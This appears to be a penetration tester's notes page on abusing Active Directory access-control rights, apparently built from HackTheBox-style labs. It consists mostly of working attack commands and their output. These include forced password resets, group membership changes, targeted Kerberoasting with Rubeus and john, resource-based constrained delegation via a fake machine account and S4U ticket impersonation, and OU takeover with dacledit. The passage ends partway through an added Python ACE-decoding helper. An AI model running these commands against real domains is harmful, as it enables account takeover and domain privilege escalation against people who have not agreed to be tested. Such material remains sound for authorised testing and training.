# ACL

## Interesting ACL

* [ForceChangePassword](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#forcechangepassword) abused with `Set-DomainUserPassword` - gives us the right to reset a user's password without first knowing their password (this should be used cautiously, and it is typically best to consult our client before resetting passwords).
* `Add Members` abused with `Add-DomainGroupMember`
* [`GenericAll`](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericall) abused with `Set-DomainUserPassword` or `Add-DomainGroupMember` - this grants us full control over a target object. Again, depending on whether this is granted over a user or a group, we could modify group membership, force change a password, or perform a targeted Kerberoasting attack. If we have this access over a computer object and the [Local Administrator Password Solution (LAPS)](https://www.microsoft.com/en-us/download/details.aspx?id=46899) is in use in the environment, we can read the LAPS password and gain local admin access to the machine, which may aid us in lateral movement or privilege escalation in the domain if we can obtain privileged controls or gain some sort of privileged access.
* [`GenericWrite`](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericwrite) abused with `Set-DomainObject` - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group, it means we could add ourselves or another security principal to the given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack, which is outside the scope of this module.
* `WriteOwner` abused with `Set-DomainObjectOwner`
* `WriteDACL` abused with `Add-DomainObjectACL`
* `AllExtendedRights` abused with `Set-DomainUserPassword` or `Add-DomainGroupMember`
* `AddSelf` abused with `Add-DomainGroupMember` - shows security groups that a user can add themselves to.

<figure><img src="/files/aWSvM3KPpdGrELbUJz3U" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/MCFPv66MD2GK5B6PqT8v" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.thehacker.recipes/assets/DACL%20abuse%20mindmap.CnS4bNaY.png>" %}

## Tools

### AbuseACL

Script to automatically list vulnerable Windows ACEs/ACLs.

{% embed url="<https://github.com/AetherBlack/abuseACL>" %}

### ACLpwn

{% embed url="<https://github.com/fox-it/aclpwn.py>" %}

### SharpADWS

{% embed url="<https://github.com/wh0amitz/SharpADWS>" %}

```
C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus

 Severity              : Critical
 ObjectDN              : CN=DC01,OU=Domain Controllers,DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
 ObjectType            : All
 Trustee               : Marcus
 IsInherited           : False
```

More commands are documented in the GitHub repo.

### ADACLScanner

{% embed url="<https://github.com/canix1/ADACLScanner>" %}

### PowerDACL

{% embed url="<https://github.com/Leo4j/PowerDACL>" %}

## ACL Enumeration

### PowerView

```powershell
Find-InterestingDomainAcl -ResolveGUIDs
```

```powershell-session
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> $sid = Convert-NameToSid wley
```

```powershell-session
PS C:\htb> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

ObjectDN               : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114-1176
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 56
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1181
AceType                : AccessAllowedObject
AceFlags               : ContainerInherit
IsInherited            : False
InheritanceFlags       : ContainerInherit
PropagationFlags       : None
AuditFlags             : None
```

```powershell-session
PS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

Name              : User-Force-Change-Password
DisplayName       : Reset Password
DistinguishedName : CN=User-Force-Change-Password,CN=Extended-Rights,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
rightsGuid        : 00299570-246d-11d0-a768-00aa006e0529
```

#### All in one

```powershell-session
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 

AceQualifier           : AccessAllowed
ObjectDN               : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Force-Change-Password
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114-1176
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1181
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0
```

```powershell-session
PS C:\htb> $sid2 = Convert-NameToSid damundsen
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose

AceType               : AccessAllowed
ObjectDN              : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3842939050-3880317879-2865463114-4022
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1176
AccessMask            : 131132
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed
```

```powershell-session
PS C:\htb> Get-DomainGroup -Identity "Help Desk Level 1" | select memberof

memberof                                                                      
--------                                                                      
CN=Information Technology,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
```

```powershell-session
PS C:\htb> $itgroupsid = Convert-NameToSid "Information Technology"
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose

AceType               : AccessAllowed
ObjectDN              : CN=Angela Dunn,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3842939050-3880317879-2865463114-1164
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-4016
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed
```

```powershell-session
PS C:\htb> $adunnsid = Convert-NameToSid adunn 
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose

AceQualifier           : AccessAllowed
ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes
ObjectSID              : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags       : ContainerInherit
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit
InheritedObjectAceType : All
OpaqueLength           : 0

<SNIP>
```

### Get-Acl & Get-ADUser

```powershell-session
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
```

```powershell-session
PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl  "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}

Path                  : Microsoft.ActiveDirectory.Management.dll\ActiveDirectory:://RootDSE/CN=Dana 
                        Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
InheritanceType       : All
ObjectType            : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : INLANEFREIGHT\wley
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : None
```

## NXC

```
nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read
```

<figure><img src="/files/2Yudt5yhAL7oqwjvk2Gs" alt=""><figcaption></figcaption></figure>

## Hidden OU ACLs

{% embed url="<https://github.com/synacktiv/OUned>" %}

## ForceChangePassword

wley -> ForceChangePassword -> damundsen

<figure><img src="/files/02xrhIvYhJ7SvFmF7coU" alt=""><figcaption></figcaption></figure>

Run as wley:

```powershell-session
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) 
```

New password:

```powershell-session
PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
```

Change the password:

```powershell-session
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset
```

### With BloodyAD

```
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
```

### With RPCclient

```
$ rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $> setuserinfo2 Audit2020 23 'PleaseSub!'
```

<figure><img src="/files/W3u3jt1pGz46t78I5QxQ" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.youtube.com/watch?app=desktop&index=18&list=PLidcsTyj9JXItWpbRtTg6aDEj10_F17x5&v=IfCysW0Od8w>" %}

## GenericWrite

The typical techniques to abuse GenericWrite are:

* Shadow Credentials (Windows Server 2016 or later)
* Targeted Kerberoasting (the password must be weak enough to be cracked)
* Resource-Based Constrained Delegation

{% hint style="success" %}
*With sufficient rights (GenericWrite or GenericAll), Kerberos pre-authentication can be forcibly disabled as well -* [*AS-REP Roasting*](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endhint %}

<figure><img src="/files/FSPykgK5LM9haCdV5uGP" alt=""><figcaption></figcaption></figure>

### **Add Member - PowerView**

Run as damundsen:

```powershell-session
PS C:\htb> $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) 
```

Add member

```powershell-session
PS C:\htb> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Add-DomainGroupMember] Adding member 'damundsen' to group 'Help Desk Level 1'
```

Confirm the user was added to the group:

```powershell-session
PS C:\htb> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

MemberName
----------
busucher
spergazed

<SNIP>

damundsen
dpayne
```

Clean up: remove the user from the group

```powershell-session
PS C:\htb> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Remove-DomainGroupMember] Removing member 'damundsen' from group 'Help Desk Level 1'
True
```

### Add Member - BloodyAD

```
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
```

### Disable Kerberos Pre Auth - ASREP Roast

{% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %}
[Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endcontent-ref %}

### Targeted Kerberoast

#### Linux

```
$ sudo ntpdate dc01.certified.htb | ./targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09' --dc-ip 10.10.11.41
```

#### Windows

Enumerate the permissions for one group with PowerView

```
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```

Check whether the victim already has an SPN

* PowerView

```
Get-DomainUser -Identity victim | select serviceprincipalname
```

* AD Module

```
Get-ADUser -Identity victim -Properties ServicePrincipalName | select ServicePrincipalName
```

Set an SPN for the victim

* PowerView

```
Set-DomainObject -Identity victim -Set @{serviceprincipalname='domain/whatever'}
```

* AD Module

```
Set-ADUser -Identity victim -ServicePrincipalNames @{Add='domain/whatever'}
```

Kerberoast the victim

```
Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\targetedhashes.txt
```

### [RBCD - Resource Based Constrained Delegation](#rbcd-resource-based-constrained-delegation-rbcd)

{% content-ref url="/pages/meZ0VXkB0aGPLQ3Q5Hot" %}
[Trustee and Resource Delegation](/0xss0rz/pentest/internal-pentest/trustee-and-resource-delegation.md)
{% endcontent-ref %}

### Windows Server 2008

Traditional methods (Shadow Credentials, RBCD, targeted Kerberoast) cannot be used, so change the password instead:

```
net rpc password 'TARGET$' Passw0rd1 -U retro2.vl/'ControlledUser$'%P@ssw0rd -S BLN01.retro2.vl
```

{% embed url="<https://seriotonctf.github.io/2024/08/25/Retro2-Vulnlab/>" %}

## GenericAll

{% hint style="success" %}
*With sufficient rights (GenericWrite or GenericAll), Kerberos pre-authentication can be forcibly disabled as well -* [*AS-REP Roasting*](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endhint %}

<figure><img src="/files/A3AvVkuxUblKCmImdCdp" alt=""><figcaption></figcaption></figure>

### [Add member](#add-member)

```
C:> net group "groupName" targetUser /domain /add
```

### [**Targeted kerberoast**](#targeted-kerberoast)

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting>" %}

```powershell-session
PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Setting 'serviceprincipalname' to 'notahacker/LEGIT' for object 'adunn'
```

```powershell-session
PS C:\htb> .\Rubeus.exe kerberoast /user:adunn /nowrap
```

{% content-ref url="/pages/WyP2ypGRBLxj0wkF4CEb" %}
[Kerberoast](/0xss0rz/pentest/internal-pentest/kerberoast.md)
{% endcontent-ref %}

Clean up: remove the fake SPN

```powershell-session
PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Clearing 'serviceprincipalname' for object 'adunn'
```

Another example

<figure><img src="/files/4yHdQmjy0e9QRhAFegIo" alt=""><figcaption></figcaption></figure>

```
PS C:\Users\mssqladm\Desktop> Import-Module .\PowerView.ps1
PS C:\Users\mssqladm\Desktop> Get-DomainUser 'ttimmons' | Select serviceprincipalname

serviceprincipalname
--------------------



PS C:\Users\mssqladm\Desktop> Set-DomainObject -Identity 'ttimmons' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Users\mssqladm\Desktop> $User = Get-DomainUser 'ttimmons'
PS C:\Users\mssqladm\Desktop> $User | Get-DomainSPNTicket | fl
```

<figure><img src="/files/oTrTPM4fTNYFvLAnt8I7" alt=""><figcaption></figcaption></figure>

### RBCD - Resource Based Constrained Delegation RBCD

{% content-ref url="/pages/meZ0VXkB0aGPLQ3Q5Hot" %}
[Trustee and Resource Delegation](/0xss0rz/pentest/internal-pentest/trustee-and-resource-delegation.md)
{% endcontent-ref %}

Change user context

```
*Evil-WinRM* PS C:\> $TargetComputer = 'TARGET.domain.local'
*Evil-WinRM* PS C:\> $UserWithDaclUsername = 'domain.local\test'
*Evil-WinRM* PS C:\> $UserWithDaclPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
*Evil-WinRM* PS C:\> $Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword)
```

1 - Add a new attacker-controlled computer account

<https://raw.githubusercontent.com/Kevin-Robertson/Powermad/refs/heads/master/Powermad.ps1>

```
*Evil-WinRM* PS C:\> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Verbose -Credential $Cred
Verbose: [+] Domain Controller =
Verbose: [+] Domain = domain.local
Verbose: [+] SAMAccountName = attackersystem$
Verbose: [+] Distinguished Name = CN=attackersystem,CN=Computers,DC=domain,DC=local
[+] Machine account attackersystem added
```

2 - Build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE

<https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/dev/Recon/PowerView.ps1>

```
*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Verbose -Credential $Cred | Select -Expand objectsid
Verbose: [Get-Domain] Using alternate credentials for Get-Domain
Verbose: [Get-Domain] Extracted domain 'domain.local' from -Credential
Verbose: [Get-DomainSearcher] search base: LDAP://dc1.domain.local/DC=domain,DC=local
Verbose: [Get-DomainSearcher] Using alternate credentials for LDAP connection
Verbose: [Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(|(name=attackersystem)))
*Evil-WinRM* PS C:\> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
*Evil-WinRM* PS C:\> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\> $SD.GetBinaryForm($SDBytes, 0)
```

3 - Set this newly created security descriptor in the `msDS-AllowedToActOnBehalfOfOtherIdentity` field of the computer account

```
*Evil-WinRM* PS C:\> Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $Cred
```

Or automate the process with RbcdPwn.ps1

<https://gist.githubusercontent.com/snovvcrash/81c8e151527bfd5e28c40ed77eb3c5ab/raw/e026157aa1cee84135c5bba4aca5bd597454e85c/RbcdPwn.ps1>

```
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Import-Module .\Powermad.ps1
PS C:\> Import-Module .\RbcdPwn.ps1
PS C:\> Invoke-RbcdPwn -FakeMachine fakemachine123
```

4 - Hash the plaintext password into its RC4_HMAC form

```
PS C:\> .\Rubeus.exe hash /domain:domain.local /user:fakemachine123$ /password:P@ssw0rd!

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : P@ssw0rd!
[*] Input username             : fakemachine123$
[*] Input domain               : domain.local
[*] Salt                       : DOMAIN.LOCALhostfakemachine123.domain.local
[*]       rc4_hmac             : 217E50203A5ABA59CEFA863C724BF61B
[*]       aes128_cts_hmac_sha1 : 9B5A2BAF536BC1D4BABE30F732A8FB39
[*]       aes256_cts_hmac_sha1 : EC73111B3BA6754EDAFF699140B8B989771EB671D52B640F622DF58E76181052
[*]       des_cbc_md5          : 4FA1ECEFBAC776CD
```

5 - Get a service ticket for the service name (sname) we want, impersonating the user we want to "pretend" to be (e.g. an admin)

```
PS C:\> .\Rubeus.exe s4u /domain:domain.local /user:fakemachine123$ /rc4:217E50203A5ABA59CEFA863C724BF61B /impersonateuser:user_to_impersonate /msdsspn:http/web.domain.local /ptt
```

```
PS C:\> cmd /c curl --negotiate -u : http://web.domain.local -o out.html -v
```

### Disable Kerberos Pre Auth - ASREP Roast

{% content-ref url="/pages/FPIbdosGSrSHYzhw5i4w" %}
[Misconfiguration](/0xss0rz/pentest/internal-pentest/misconfiguration.md)
{% endcontent-ref %}

### Change Password

```
 evil-winrm -u "username" -p 'password' -i 10.10.11.42
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents> upload PowerView.ps1
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Uploading /workspace/PowerView.ps1 to C:\Users\username\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\username\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\username\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\username\Documents> Set-DomainUserPassword -Identity targettedUser -AccountPassword $UserPassword 
*Evil-WinRM* PS C:\Users\username\Documents> exit
                                        
Info: Exiting with code 0
[Nov 22, 2024 - 03:13:42 (EST)] exegol-Lab /workspace # nxc smb 10.10.11.42 -u 'targettedUser' -p 'Password123!' --shares
```

#### With BloodyAD

```
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
```

### On OU - **Generic Descendant Object Takeover**

<figure><img src="/files/SwoZnbxmkIh8sjEJ7ySg" alt=""><figcaption></figcaption></figure>

```
# getTGT.py 'domain.htb/d.anderson:password' -dc-ip 10.10.11.31 

# export KRB5CCNAME=d.anderson.ccache

# dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=DOMAIN,DC=HTB' 'domain.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20241204-045901.bak
[*] DACL modified successfully!
```

<figure><img src="/files/SIYJySonicmz3jbjQ2JJ" alt=""><figcaption></figcaption></figure>

```
# bloodyAD --host "dc01.domain.htb" -d "domain.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "password" set password "e.rodriguez" "0xss0rzpass++++"
[+] Password changed successfully!
```

## AddSelf

`AddSelf` is similar to `AddMember`: while `AddMember` is the `WriteProperty` access right on the target's `Member` attribute, `AddSelf` is the `Self` access right on that same attribute, allowing the attacker to add themselves to the target group rather than arbitrary principals.

```
# bloodyAD --host "10.10.11.31" -d "domain.htb" -u "e.rodriguez" -p '0xss0rzpass++++' add groupMember "chiefs marketing" "e.rodriguez"
[+] e.rodriguez added to chiefs marketing
```

{% embed url="<https://www.hackingarticles.in/abusing-ad-dacl-addself/>" %}
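As an added example (not from the original notes or from any of the tools linked here), the Python below decodes the numeric `AccessMask` values shown in the PowerView output of the ACL Enumeration section (256, 131132, 983551) into the same right names PowerView prints, converts the `CCDCLCSWRPWPDTLOCRSDRCWDWO` SDDL rights string from RBCD step 2 to that same mask, and classifies each ACE into the categories of the Interesting ACL list, including the `Self` versus `WriteProperty` on `Member` distinction described above. The GUIDs are the well-known AD schema values; the SID in the SDDL sample is constructed.

```python
"""Decode AD ACE access masks the way PowerView / .NET ActiveDirectoryRights prints them, convert
SDDL rights strings to the same mask, and classify ACEs into the "Interesting ACL" categories."""
import re
from dataclasses import dataclass

# System.DirectoryServices.ActiveDirectoryRights values, composite names included.
ACTIVE_DIRECTORY_RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "GenericExecute": 0x20004, "GenericWrite": 0x20028, "GenericRead": 0x20094,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "GenericAll": 0xF01FF,
    "Synchronize": 0x100000, "AccessSystemSecurity": 0x1000000,
}
# Two-letter rights codes of an SDDL ACE ("CCDCLCSWRPWPDTLOCRSDRCWDWO" in the RBCD step above).
SDDL_RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20, "DT": 0x40,
    "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
NULL_GUID = "00000000-0000-0000-0000-000000000000"
# Well-known AD schema GUIDs of the control-access rights and the attribute this page refers to.
KNOWN_GUIDS = {
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "Member",
}

@dataclass
class Ace:
    trustee: str
    object_dn: str
    access_mask: int
    object_ace_type: str = NULL_GUID  # GUID the right is scoped to; null GUID = whole object
    object_class: str = ""            # "user", "group", "computer", ... when known

def decode_mask(mask: int) -> list[str]:
    """Name the bits like .NET's [Flags] Enum.ToString (largest named values first), so
    131132 -> ['ListChildren', 'ReadProperty', 'GenericWrite'] exactly as PowerView shows."""
    names, remaining = [], mask
    for name, value in sorted(ACTIVE_DIRECTORY_RIGHTS.items(), key=lambda kv: -kv[1]):
        if remaining & value == value:
            names.append(name)
            remaining &= ~value
    return names[::-1] + ([f"Unknown(0x{remaining:X})"] if remaining else [])

def sddl_rights_mask(rights: str) -> int:
    """Two-letter rights field of an SDDL ACE -> numeric mask (KeyError on an unknown code)."""
    if len(rights) % 2:
        raise ValueError(f"odd-length SDDL rights string: {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask

def parse_sddl_dacl(sddl: str, object_dn: str = "", object_class: str = "") -> list[Ace]:
    """Extract the Allow ACEs "(A;flags;rights;object_guid;inherit_guid;sid)" of an SDDL string,
    e.g. the descriptor an RBCD attack writes into msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = []
    for raw in re.findall(r"\(([^)]*)\)", sddl):
        fields = raw.split(";")
        if len(fields) >= 6 and fields[0] == "A":
            _, _flags, rights, obj_guid, _inh_guid, sid = fields[:6]
            aces.append(Ace(sid, object_dn, sddl_rights_mask(rights), obj_guid or NULL_GUID, object_class))
    return aces

def classify(ace: Ace) -> list[str]:
    """Map an ACE to the 'Interesting ACL' categories. Raw bits are tested, so GenericWrite over a
    group also reports AddMember/AddSelf: it contains WriteProperty and Self over every attribute."""
    has = lambda n: ace.access_mask & ACTIVE_DIRECTORY_RIGHTS[n] == ACTIVE_DIRECTORY_RIGHTS[n]
    target = KNOWN_GUIDS.get(ace.object_ace_type.lower(), ace.object_ace_type.lower())
    if has("GenericAll"):
        return ["GenericAll"]
    found = [name for name in ("GenericWrite", "WriteOwner") if has(name)]
    if has("WriteDacl"):
        found.append("WriteDACL")
    if has("ExtendedRight"):  # scoped to one control-access right GUID, or to all of them
        found.append("AllExtendedRights" if target == NULL_GUID else
                     "ForceChangePassword" if target == "User-Force-Change-Password" else
                     f"ExtendedRight:{target}")
    # AddMember is WriteProperty on Member; AddSelf is Self on Member (see the AddSelf section).
    on_member = target == "Member" or (target == NULL_GUID and ace.object_class == "group")
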